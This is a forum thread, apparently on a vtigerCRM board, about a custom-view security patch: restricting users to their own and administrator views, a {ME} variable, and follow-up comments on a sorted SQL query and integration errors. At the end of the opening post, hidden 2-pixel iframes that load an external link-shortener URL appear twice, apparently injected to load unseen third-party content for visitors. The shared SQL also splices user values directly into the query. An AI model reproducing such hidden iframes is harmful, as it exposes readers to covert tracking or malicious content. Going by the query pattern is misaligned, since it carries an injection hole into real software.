CustomView Enhancements (Security)

The attached files address:

Individual users now:
1) Can only see administrator views and views created by themselves
2) Administrator views are read-only
3) If user Edits an Administrator view, he is forced to save as a new named view.

Includes other CV patch as well:
1) Adds capability to test if a field is blank or not
2) Adds a special variable {ME} as a test value -- a custom view can be set to only show My Items and be valid for everyone
3) Allows a custom field to be saved as a new Custom Field. Got a CV you like? Rename and save as a new field without having to re-enter all the info.

Provided in 2 forms:

Complete file to merge back into htdocs/vtigerCRM
.diff file for patching against existing system. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
«1

Comments

  • 11 Comments sorted by Votes Date Added
  • thanks mike, i will try these latter.
  • dear mike,

    thanks for your code contribution and enhancing the customview. you code is taken up and will be available from patch-ii release, your alteration in customview table will be captured in the data dictionary itself. special variable {me} is really good. please send your views in enhancing the customview.

    thanks & regards,
    raj
  • thanks, raj. i've made 1 more change to cv's, which is to change the select statement in customview.php to:
    $ssql = &quot;select customview&#46;* from customview inner join tab on tab&#46;name = customview&#46;entitytype
    							where &#40;customview&#46;smownerid=1 or customview&#46;smownerid=&quot;&#46;$current_user-&gt;id&#46;&quot;&#41; 
    							and tab&#46;tabid=$tabid order by customview&#46;viewname&quot;;
    

    the order by is key. i don't know how other folks are doing it, but we are using cv's substantially to view our data. getting so many made it hard to find a specific entry. now our drop-down list looks like:
    focus on closing (elcom)
    focus on closing (mine)
    focus on closing (my geo)
    new monthly opportunities
    new weekly opportunities
    potentials
    principal=altera (mine)
    principal=altera (my geo)
    principal=intel (mine)
    principal=intel (my geo)
    principal=wavecom (elcom)
    report-intel ica items
    report-monthly items
    report-weekly altera
    report-weekly intel
  • hi mike,

    we tried to integrate the patch which you've given here into the product for vtigercrm 4.2 patch1.

    but after unzipping the file which you've given, we are not able to create the 'customview'.

    as we are interested in integrating this into the product, could you please make the necessary changes for vtigercrm 4.2 patch1 and get back to us?

    thanks & regards,
    jaguar
  • jaguar,

    you downloaded off repository, right?

    also, my repository code is missing a patch i submitted to richie. essentially, each module should control it's own sort order. i proposed changing index.php in each module handle sorting like:
    //&lt;&lt;&lt;&lt;&lt;&lt;&lt; sort ordering &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
    $sorder = $focus-&gt;getsortorder&#40;&#41;;
    $order_by = $focus-&gt;getorderby&#40;&#41;;
    //&lt;&lt;&lt;&lt;&lt;&lt;&lt; sort ordering &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
    
    //&lt;&lt;&lt;&lt;cutomview&gt;&gt;&gt;&gt;&gt;&gt;&gt;
    $ocustomview = new customview&#40;$currentmodule&#41;;
    $customviewcombo_html = $ocustomview-&gt;getcustomviewcombo&#40;&#41;;
    $viewid = $ocustomview-&gt;getviewid&#40;$currentmodule&#41;;
    //&lt;&lt;&lt;&lt;&lt;customview&gt;&gt;&gt;&gt;&gt;
    

    i think that's the issue, but i need to know more. pm, im, or email me more details of how it's failing, please.
  • hello mikecrowe!
    thanks for customview enhancement!
    but i have this problem:
    after replacing customview with files provided in zip file, when i try to edit any view i get the following error:
    d:\vtigercrm\apache\htdocs\vtigercrm\include\database\peardatabase.php on line 426

    runnng 4.2 patch2 on win2003/apache
    any idea?
    thanks in advance!
  • oups...
    the problems apears only after i have changed the statement:
    $ssql = "select customview.* from customview inner join tab on tab.name = customview.entitytype
    where (customview.smownerid=1 or customview.smownerid=".$current_user->id.")
    and tab.tabid=$tabid order by customview.viewname";
    after reverting to original it works fine again. sorting views is not suported!
    why?
  • another issue!
    for all users, admin or not the only available option is save as new (editing by admin user is not alowed for any view!!!)
  • so for modifying a view you have to edit, reneme and after that delet old isn't so?
  • hello,

    what's the state of affairs with this contribution?

    i would like to integrate it into my vtiger.

    best regards...
    steffen
Sign In or Register to comment.